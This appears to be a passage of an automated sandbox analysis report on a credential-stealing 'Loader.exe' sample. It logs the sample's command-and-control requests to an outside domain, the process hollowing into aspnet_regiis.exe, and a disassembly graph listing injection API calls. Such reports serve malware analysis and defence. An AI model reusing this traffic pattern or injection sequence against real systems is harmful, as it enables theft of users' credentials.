                                                                          2024-10-31 13:07:06 UTC1142OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 44 45 41 30 41 34 39 44 38 44 36 38 36 38 36 43 35 38 41 44 43 33 31 34 32 46 36 42 42 34 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 31 37 61 39 35
                                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7DEA0A49D8D68686C58ADC3142F6BB48--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--17a95
                                                                          2024-10-31 13:07:06 UTC1008INHTTP/1.1 200 OK
                                                                          Date: Thu, 31 Oct 2024 13:07:06 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=f7dkb6cta6vtrt76ud5q5l4imh; expires=Mon, 24-Feb-2025 06:53:45 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          cf-cache-status: DYNAMIC
                                                                          vary: accept-encoding
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6uSR25JyPvkKpM2LLvEVSJt4Oj6oreQUGH6gqVxR5yVyPL4BnldGBCU6jq4HC55JUoWyA8SS4AmgcDnNxWbp3mJyUc6ntwPLXjf1KFpAW1z1r8V4%2Fs9z%2F2cn6KSTbtBdG94%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8db3ddbe5a513064-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2048&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2058&delivery_rate=1262974&cwnd=251&unsent_bytes=0&cid=d9b4cfdadcd3904b&ts=459&x=0"
                                                                          2024-10-31 13:07:06 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                          Data Ascii: 11ok 173.254.250.77
                                                                          2024-10-31 13:07:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.649730104.21.41.1584432096C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-31 13:07:07 UTC264OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 121
                                                                          Host: mafnufacut.cyou
                                                                          2024-10-31 13:07:07 UTC121OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 31 37 61 39 35 31 37 61 64 64 30 37 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 37 44 45 41 30 41 34 39 44 38 44 36 38 36 38 36 43 35 38 41 44 43 33 31 34 32 46 36 42 42 34 38
                                                                          Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--17a9517add07&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=7DEA0A49D8D68686C58ADC3142F6BB48
                                                                          2024-10-31 13:07:08 UTC1022INHTTP/1.1 200 OK
                                                                          Date: Thu, 31 Oct 2024 13:07:08 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=0u9k8ebel6q9vdkiuiirc0dego; expires=Mon, 24-Feb-2025 06:53:46 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          cf-cache-status: DYNAMIC
                                                                          vary: accept-encoding
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pm%2FtQmUyQmH%2Fjq7NGVnbCeLcc4YCvO49%2B8dNj8kQTEyhsCcL8UhV5fBe7oQUW64IuEGM8I8fNB%2FU7DZ8%2B7P6MXIml0gbychD%2BeA%2FR%2B%2BUYXlJOaYyTaNW743U10GjOKtNthY%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8db3ddc52e453165-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1515&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1021&delivery_rate=1845761&cwnd=244&unsent_bytes=0&cid=1087649e696ec3d9&ts=488&x=0"
                                                                          2024-10-31 13:07:08 UTC54INData Raw: 33 30 0d 0a 36 4f 65 56 70 45 34 64 30 49 54 51 38 30 62 38 45 53 73 65 31 79 36 34 4c 35 53 59 57 64 6c 31 35 43 64 66 2f 6f 44 4d 78 42 75 7a 75 67 3d 3d 0d 0a
                                                                          Data Ascii: 306OeVpE4d0ITQ80b8ESse1y64L5SYWdl15Cdf/oDMxBuzug==
                                                                          2024-10-31 13:07:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:09:06:54
                                                                          Start date:31/10/2024
                                                                          Path:C:\Users\user\Desktop\Loader.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                          Imagebase:0x800000
                                                                          File size:304'640 bytes
                                                                          MD5 hash:CF19765D8A9A2C2FD11A7A8C4BA3DEDA
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:1
                                                                          Start time:09:06:54
                                                                          Start date:31/10/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:3
                                                                          Start time:09:06:55
                                                                          Start date:31/10/2024
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                          Imagebase:0x800000
                                                                          File size:43'016 bytes
                                                                          MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2236456187.0000000003620000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:5.1%
                                                                            Dynamic/Decrypted Code Coverage:8.1%
                                                                            Signature Coverage:37.8%
                                                                            Total number of Nodes:185
                                                                            Total number of Limit Nodes:15
                                                                            execution_graph 27352 6e4f7c5e 27353 6e4f7c9c 27352->27353 27354 6e4f7c69 27352->27354 27380 6e4f7db8 86 API calls 4 library calls 27353->27380 27356 6e4f7c8e 27354->27356 27357 6e4f7c6e 27354->27357 27364 6e4f7cb1 27356->27364 27359 6e4f7c84 27357->27359 27360 6e4f7c73 27357->27360 27379 6e4f826b 23 API calls 27359->27379 27363 6e4f7c78 27360->27363 27378 6e4f828a 21 API calls 27360->27378 27365 6e4f7cbd __FrameHandler3::FrameUnwindToState 27364->27365 27381 6e4f82fb 27365->27381 27367 6e4f7d27 ___scrt_is_nonwritable_in_current_image CallUnexpected 27367->27363 27368 6e4f7cc4 __DllMainCRTStartup@12 27368->27367 27369 6e4f7ceb 27368->27369 27370 6e4f7db0 27368->27370 27392 6e4f825d IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 27369->27392 27395 6e4f849a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter CallUnexpected 27370->27395 27373 6e4f7db7 27374 6e4f7cfa __RTC_Initialize 27374->27367 27393 6e4f817b InitializeSListHead 27374->27393 27376 6e4f7d08 27376->27367 27394 6e4f8232 IsProcessorFeaturePresent ___scrt_release_startup_lock 27376->27394 27378->27363 27379->27363 27380->27363 27382 6e4f8304 27381->27382 27396 6e4f8658 IsProcessorFeaturePresent 27382->27396 27384 6e4f8310 27397 6e4f914d 10 API calls 2 library calls 27384->27397 27386 6e4f8315 27387 6e4f8319 27386->27387 27398 6e4fb916 27386->27398 27387->27368 27390 6e4f8330 27390->27368 27392->27374 27393->27376 27394->27367 27395->27373 27396->27384 27397->27386 27402 6e4fe43c 27398->27402 27401 6e4f917f 7 API calls 2 library calls 27401->27387 27403 6e4fe44c 27402->27403 27404 6e4f8322 27402->27404 27403->27404 27406 6e4fe300 27403->27406 27404->27390 27404->27401 27407 6e4fe307 27406->27407 27408 6e4fe34a GetStdHandle 27407->27408 27409 6e4fe3ac 27407->27409 27410 6e4fe35d GetFileType 27407->27410 27408->27407 27409->27403 27410->27407 27411 6e4f7f9e 27412 6e4f7fac 27411->27412 27413 6e4f7fa7 27411->27413 27417 6e4f7e68 27412->27417 27432 6e4f8130 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 27413->27432 27419 6e4f7e74 __FrameHandler3::FrameUnwindToState 27417->27419 27418 6e4f7e9d dllmain_raw 27421 6e4f7eb7 dllmain_crt_dispatch 27418->27421 27429 6e4f7e83 27418->27429 27419->27418 27420 6e4f7e98 27419->27420 27419->27429 27433 6e4f7650 5 API calls __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 27420->27433 27421->27420 27421->27429 27423 6e4f7ed8 27424 6e4f7f09 27423->27424 27434 6e4f7650 5 API calls __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 27423->27434 27425 6e4f7f12 dllmain_crt_dispatch 27424->27425 27424->27429 27427 6e4f7f25 dllmain_raw 27425->27427 27425->27429 27427->27429 27428 6e4f7ef0 27435 6e4f7db8 86 API calls 4 library calls 27428->27435 27431 6e4f7efe dllmain_raw 27431->27424 27432->27412 27433->27423 27434->27428 27435->27431 27436 6e4fb467 27451 6e4fd7ab 27436->27451 27441 6e4fb48f 27480 6e4fb4c0 29 API calls 3 library calls 27441->27480 27442 6e4fb483 27479 6e4fc7a7 14 API calls __dosmaperr 27442->27479 27445 6e4fb489 27446 6e4fb496 27481 6e4fc7a7 14 API calls __dosmaperr 27446->27481 27448 6e4fb4b3 27482 6e4fc7a7 14 API calls __dosmaperr 27448->27482 27450 6e4fb4b9 27452 6e4fd7b4 27451->27452 27456 6e4fb478 27451->27456 27483 6e4fc115 39 API calls 3 library calls 27452->27483 27454 6e4fd7d7 27484 6e4fd5b6 49 API calls 3 library calls 27454->27484 27457 6e4fdd02 GetEnvironmentStringsW 27456->27457 27458 6e4fb47d 27457->27458 27459 6e4fdd1a 27457->27459 27458->27441 27458->27442 27485 6e4fdc5f WideCharToMultiByte ___scrt_uninitialize_crt 27459->27485 27461 6e4fdd37 27462 6e4fdd4c 27461->27462 27463 6e4fdd41 FreeEnvironmentStringsW 27461->27463 27486 6e4fecbe 15 API calls __dosmaperr 27462->27486 27463->27458 27465 6e4fdd53 27466 6e4fdd6c 27465->27466 27467 6e4fdd5b 27465->27467 27488 6e4fdc5f WideCharToMultiByte ___scrt_uninitialize_crt 27466->27488 27487 6e4fc7a7 14 API calls __dosmaperr 27467->27487 27470 6e4fdd7c 27472 6e4fdd8b 27470->27472 27473 6e4fdd83 27470->27473 27471 6e4fdd60 FreeEnvironmentStringsW 27474 6e4fdd9d 27471->27474 27490 6e4fc7a7 14 API calls __dosmaperr 27472->27490 27489 6e4fc7a7 14 API calls __dosmaperr 27473->27489 27474->27458 27477 6e4fdd89 FreeEnvironmentStringsW 27477->27474 27479->27445 27480->27446 27481->27448 27482->27450 27483->27454 27484->27456 27485->27461 27486->27465 27487->27471 27488->27470 27489->27477 27490->27477 27491 da59a0 27495 da59b7 27491->27495 27492 da5bb7 27495->27492 27498 da0824 27495->27498 27502 da5424 27495->27502 27506 da68d8 27495->27506 27510 da68e0 27495->27510 27499 da66a0 LoadLibraryW 27498->27499 27501 da671f 27499->27501 27501->27495 27503 da6a30 CloseHandle 27502->27503 27505 da6a9e 27503->27505 27505->27495 27507 da691e 27506->27507 27514 6e4f38a0 27507->27514 27511 da691e 27510->27511 27513 6e4f38a0 54 API calls 27511->27513 27512 da6941 27512->27495 27513->27512 27517 6e4f38c0 CallUnexpected 27514->27517 27515 6e4f702e CloseHandle 27515->27517 27516 6e4f4c70 VirtualAlloc 27516->27517 27517->27515 27517->27516 27518 6e4f5241 NtWriteVirtualMemory 27517->27518 27519 6e4f762b CloseHandle 27517->27519 27520 6e4f559f NtWriteVirtualMemory 27517->27520 27521 6e4f707c GetConsoleWindow ShowWindow 27517->27521 27526 6e4f75ef NtSetContextThread NtResumeThread 27517->27526 27527 6e4f6c59 NtCreateThreadEx 27517->27527 27528 6e4f6533 NtWriteVirtualMemory 27517->27528 27529 6e4f5060 NtGetContextThread 27517->27529 27530 6e4f74f3 NtWriteVirtualMemory 27517->27530 27531 6e4f755d NtCreateThreadEx 27517->27531 27532 6e4f51ae NtAllocateVirtualMemory 27517->27532 27533 6e4f5122 NtAllocateVirtualMemory 27517->27533 27534 6e4f4f37 CreateProcessW 27517->27534 27535 6e4f69a2 NtWriteVirtualMemory 27517->27535 27536 6e4f4915 GetConsoleWindow ShowWindow 27517->27536 27538 6e4f6eda NtSetContextThread NtResumeThread 27517->27538 27539 6e4f11b0 21 API calls 27517->27539 27541 6e4f7166 NtWriteVirtualMemory 27517->27541 27542 6e4f638f NtReadVirtualMemory 27517->27542 27543 6e4f73c1 NtReadVirtualMemory 27517->27543 27544 6e4f747b NtWriteVirtualMemory 27517->27544 27545 6e4f71fc NtWriteVirtualMemory 27517->27545 27546 6e4f705b 27517->27546 27550 6e4f6fbf CloseHandle 27517->27550 27551 6e4f713f NtGetContextThread 27517->27551 27552 6e4f5824 NtWriteVirtualMemory 27517->27552 27573 6e4f3120 27517->27573 27582 6e4f1000 5 API calls __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 27517->27582 27518->27517 27519->27517 27520->27517 27522 6e4f11b0 21 API calls 27521->27522 27525 6e4f70a9 27522->27525 27523 6e4f11b0 21 API calls 27523->27525 27525->27517 27525->27523 27590 6e4f1000 5 API calls __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 27525->27590 27526->27517 27527->27517 27528->27517 27529->27517 27530->27517 27531->27517 27532->27517 27533->27517 27534->27517 27535->27517 27553 6e4f11b0 27536->27553 27538->27517 27539->27517 27541->27517 27542->27517 27543->27517 27544->27517 27545->27517 27583 6e4f7c50 27546->27583 27548 da6941 27548->27495 27550->27517 27551->27517 27552->27517 27561 6e4f11d9 __InternalCxxFrameHandler 27553->27561 27554 6e4f25b6 27555 6e4f7c50 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 27554->27555 27556 6e4f25c0 27555->27556 27556->27517 27557 6e4f25d7 GetCurrentProcess 27558 6e4f8870 CallUnexpected 27557->27558 27559 6e4f260f GetModuleHandleA 27558->27559 27559->27561 27560 6e4f1b1a GetModuleFileNameA CreateFileA 27560->27561 27561->27554 27561->27557 27561->27560 27562 6e4f23c8 VirtualProtect 27561->27562 27563 6e4f18dc GetCurrentProcess 27561->27563 27566 6e4f1d45 CloseHandle 27561->27566 27567 6e4f1cb4 CreateFileMappingA 27561->27567 27568 6e4f26dd VirtualProtect 27561->27568 27569 6e4f1d72 MapViewOfFile 27561->27569 27570 6e4f1ac0 K32GetModuleInformation 27561->27570 27571 6e4f22bd VirtualProtect 27561->27571 27572 6e4f2563 CloseHandle CloseHandle CloseHandle 27561->27572 27562->27561 27591 6e4f8870 27563->27591 27566->27561 27567->27561 27568->27561 27569->27561 27570->27561 27571->27561 27572->27561 27576 6e4f3171 27573->27576 27574 6e4f3447 GetModuleHandleW 27581 6e4f3470 CallUnexpected 27574->27581 27575 6e4f35a0 NtQueryInformationProcess 27575->27576 27576->27574 27576->27575 27577 6e4f36d9 27576->27577 27579 6e4f3709 GetModuleHandleW 27576->27579 27578 6e4f7c50 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 27577->27578 27580 6e4f36e9 27578->27580 27579->27581 27580->27517 27581->27576 27582->27517 27584 6e4f7c59 IsProcessorFeaturePresent 27583->27584 27585 6e4f7c58 27583->27585 27587 6e4f7ffe 27584->27587 27585->27548 27593 6e4f7fc1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 27587->27593 27589 6e4f80e1 27589->27548 27590->27525 27592 6e4f1926 GetModuleHandleA 27591->27592 27592->27561 27593->27589

                                                                            Executed Functions

                                                                            Function 6E4F38A0 Relevance: 87.8, APIs: 30, Strings: 18, Instructions: 3793nativethreadmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryVirtual$ThreadWrite$ContextWindow$Create$AllocateConsoleReadResumeShow$CloseHandleProcess
                                                                            • String ID: 5:$5:$:pY$:pY$@$B|6$B|6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$MZx$eaE$f0iY$f0iY$kernel32.dll$ntdll.dll$vG(J$f?i
                                                                            • API String ID: 3005639651-369745059
                                                                            • Opcode ID: 8e9effaa500bb89b72883554182c548cd5da3f6738c681ec908406b2b9bada63
                                                                            • Instruction ID: af065a26e0f41da7d6f1e491f4ebdb94a9e7a4b7bda2d28a3c806978e2b5d7b0
                                                                            • Opcode Fuzzy Hash: 8e9effaa500bb89b72883554182c548cd5da3f6738c681ec908406b2b9bada63
                                                                            • Instruction Fuzzy Hash: E563FF72A54211CFDF14CE7CC9A5BCA7BF1AB86310F11819AD54DDB384CA398A8ACF45
                                                                            Function 6E4F11B0 Relevance: 32.9, APIs: 16, Strings: 2, Instructions: 1380filememoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle$FileProtectVirtual$CreateInformationMappingModuleView
                                                                            • String ID: .text$@
                                                                            • API String ID: 3318681058-3116941980
                                                                            • Opcode ID: 57c7caa802f74f916f5d9d1950d77d2623d31a5bf7d03853f791323042c0c253
                                                                            • Instruction ID: e6248edcb75ae4fc796dc809d8e9958b4c03560d71d1b622bfd649cf0d5a2d94
                                                                            • Opcode Fuzzy Hash: 57c7caa802f74f916f5d9d1950d77d2623d31a5bf7d03853f791323042c0c253
                                                                            • Instruction Fuzzy Hash: E5C2DF75A04655CFDB14CEBCC894BDEBBF2AB86310F10819AD459EB355CB35898ACF02
                                                                            Function 6E4F3120 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 486nativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 745 6e4f3120-6e4f316a 746 6e4f3171-6e4f317c 745->746 747 6e4f332d-6e4f33c3 746->747 748 6e4f3182-6e4f318f 746->748 750 6e4f37af 747->750 751 6e4f33c8-6e4f33cf 748->751 752 6e4f3195-6e4f31a2 748->752 750->746 751->750 754 6e4f31a8-6e4f31b5 752->754 755 6e4f3447-6e4f3524 GetModuleHandleW call 6e4f2760 call 6e4f8870 752->755 758 6e4f364c-6e4f3662 754->758 759 6e4f31bb-6e4f31c8 754->759 755->750 758->750 763 6e4f31ce-6e4f31db 759->763 764 6e4f367c-6e4f368b 759->764 767 6e4f36b9-6e4f36c0 763->767 768 6e4f31e1-6e4f31ee 763->768 764->750 767->750 770 6e4f36f4-6e4f3704 768->770 771 6e4f31f4-6e4f3201 768->771 770->750 773 6e4f3207-6e4f3214 771->773 774 6e4f36c5-6e4f36d4 771->774 776 6e4f377a-6e4f37a8 773->776 777 6e4f321a-6e4f3227 773->777 774->750 776->750 779 6e4f322d-6e4f323a 777->779 780 6e4f3667-6e4f3677 777->780 783 6e4f3535-6e4f359b 779->783 784 6e4f3240-6e4f324d 779->784 780->750 783->750 786 6e4f3253-6e4f3260 784->786 787 6e4f3690-6e4f369f 784->787 789 6e4f3266-6e4f3273 786->789 790 6e4f32e2-6e4f3328 786->790 787->750 792 6e4f3279-6e4f3286 789->792 793 6e4f35a0-6e4f3647 NtQueryInformationProcess 789->793 790->750 795 6e4f328c-6e4f3299 792->795 796 6e4f36a4-6e4f36b4 792->796 793->750 798 6e4f329f-6e4f32ac 795->798 799 6e4f36d9-6e4f36f3 call 6e4f7c50 795->799 796->750 802 6e4f3709-6e4f3775 GetModuleHandleW call 6e4f2760 call 6e4f8870 798->802 803 6e4f32b2-6e4f32bf 798->803 802->750 808 6e4f32c5-6e4f32d2 803->808 809 6e4f33d4-6e4f3442 803->809 813 6e4f3529-6e4f3530 808->813 814 6e4f32d8-6e4f32dd 808->814 809->750 813->750 814->750
                                                                            APIs
                                                                            • NtQueryInformationProcess.NTDLL ref: 6E4F35CC
                                                                            • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,-70489D92), ref: 6E4F3715
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: HandleInformationModuleProcessQuery
                                                                            • String ID: NtQueryInformationProcess$[6u2$ntdll.dll
                                                                            • API String ID: 2776635927-713812009
                                                                            • Opcode ID: 9f1fdbf62fa3bf55b3615f8e83a909fc9023cf56ee9500bbfea2c2af6db2d74b
                                                                            • Instruction ID: 50dbebd8baa15f42f7c7947e37203b3440658e473d57fd927761e0964a51df8f
                                                                            • Opcode Fuzzy Hash: 9f1fdbf62fa3bf55b3615f8e83a909fc9023cf56ee9500bbfea2c2af6db2d74b
                                                                            • Instruction Fuzzy Hash: C202BEB6E14605CFCF04CEBCC598BDEBBF1AB86714F11851AD825DB390C636990B8B42
                                                                            Function 00DA41FC Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 955 da41fc-da4254 956 da4296 955->956 957 da4256-da4258 955->957 958 da4299 956->958 959 da429e-da42b3 958->959 960 da42b9 959->960 961 da4442-da4449 959->961 960->958 960->961 962 da43be-da4413 960->962 963 da434f-da4361 960->963 964 da4330-da4334 960->964 965 da42c0-da432b 960->965 966 da4366-da43b9 960->966 987 da4419-da4427 962->987 963->959 967 da433d 964->967 968 da4336-da433b 964->968 965->959 966->959 971 da4342-da434a 967->971 968->971 971->959 991 da4429-da442e 987->991 992 da4430 987->992 994 da4435-da443d 991->994 992->994 994->959
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @Qj5$|]#
                                                                            • API String ID: 0-3690627549
                                                                            • Opcode ID: a95ae061d7186ae66d67e97d3bc5374ecb298f6aa397c6f921e97e3d1d90d404
                                                                            • Instruction ID: 8c8c5aff67c5a37e67c6464a0a7b9356d94809a6f82117861ed153e661fef3b1
                                                                            • Opcode Fuzzy Hash: a95ae061d7186ae66d67e97d3bc5374ecb298f6aa397c6f921e97e3d1d90d404
                                                                            • Instruction Fuzzy Hash: 4151E170704304CFD7989B79881476A7BB6BFCA314B24886AD486DF3A6DEB4CC068765
                                                                            Function 00DA08C0 Relevance: 1.5, Strings: 1, Instructions: 279COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
